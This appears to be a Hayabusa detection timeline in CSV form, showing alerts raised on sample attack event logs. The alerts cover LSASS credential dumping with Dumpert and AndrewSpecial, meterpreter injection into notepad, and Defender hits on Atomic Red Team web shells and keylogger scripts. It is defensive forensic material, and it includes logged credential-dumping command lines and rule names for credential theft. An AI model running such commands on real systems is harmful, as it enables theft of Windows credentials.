+2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3572 | Src PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.128 +09:00,alice.insecurebank.local,1,info,,Process Created,"Cmd: rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump | Process: C:\Windows\System32\rundll32.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Windows\system32\rundll32.exe | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,../hayabusa-rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.264 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: 
ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Windows\system32\rundll32.exe | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,../hayabusa-rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:35:50.749 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff 
| Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: AndrewSpecial.exe | Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 3552 | PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Hash: SHA1=FE6BEB0E26F71F8587415507B318B161FBC3338B,MD5=4791C98C096587DB8DFECD5CA894DD56,SHA256=2969E70B74A12E3B0441D0BDA498322464A8614421B00321E889756D60AB4200,IMPHASH=40B5A4911712471B34D39C3AC7E99193",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:36:51.681 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Users\administrator\Desktop\Andrew.dmp | Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | PID: 3552 | PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:36:51.681 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | Tgt Process: 
C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3552 | Src PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 16:36:51.682 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3552 | Src PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-07-04 05:10:06.475 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Lateral Movement - New Named Pipe added to NullSession | SetValue: HKLM\System\CurrentControlSet\services\LanmanServer\Parameters\NullSessionPipes: Binary Data | Process: C:\Windows\system32\reg.exe | PID: 3844 | PGUID: 365ABB72-0B9E-5D1D-0000-00100BF40D00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_add_new_namedpipe_tp_nullsession_registry_turla_like_ttp.evtx +2019-07-04 05:39:29.223 +09:00,IEWIN7,10,low,,Process Access,Src Process: ㄀ | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 
365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:29.223 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.129 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.145 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.160 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.192 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.207 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.239 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\notepad.exe"" | LID: 0x135ca | PID: 2328 | PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\system32\notepad.exe | Tgt Process: C:\Windows\system32\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1632 | Src PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00 | Tgt PID: 2328 | Tgt PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,LatMov | Exec,Rundll32 Without Parameters,,../hayabusa-rules/sigma/process_creation/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:31.707 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49159 (IEWIN7) | Dst: 10.0.2.18:8181 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\rundll32.exe | PID: 2328 | PGUID: 
365ABB72-1282-5D1D-0000-0010DD401B00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:PowerShell/Powersploit.M | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:XML/Exeselrun.gen!A | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: HackTool:JS/Jsprat | Severity: High | Type: Tool | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,ResDev,Relevant Anti-Virus 
Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Backdoor:ASP/Ace.T | Severity: Severe | Type: Backdoor | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:Win32/Sehyioa.A!cl | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: HackTool:JS/Jsprat | Severity: High | Type: Tool | User: MSEDGEWIN10\IEUser | Path: containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); 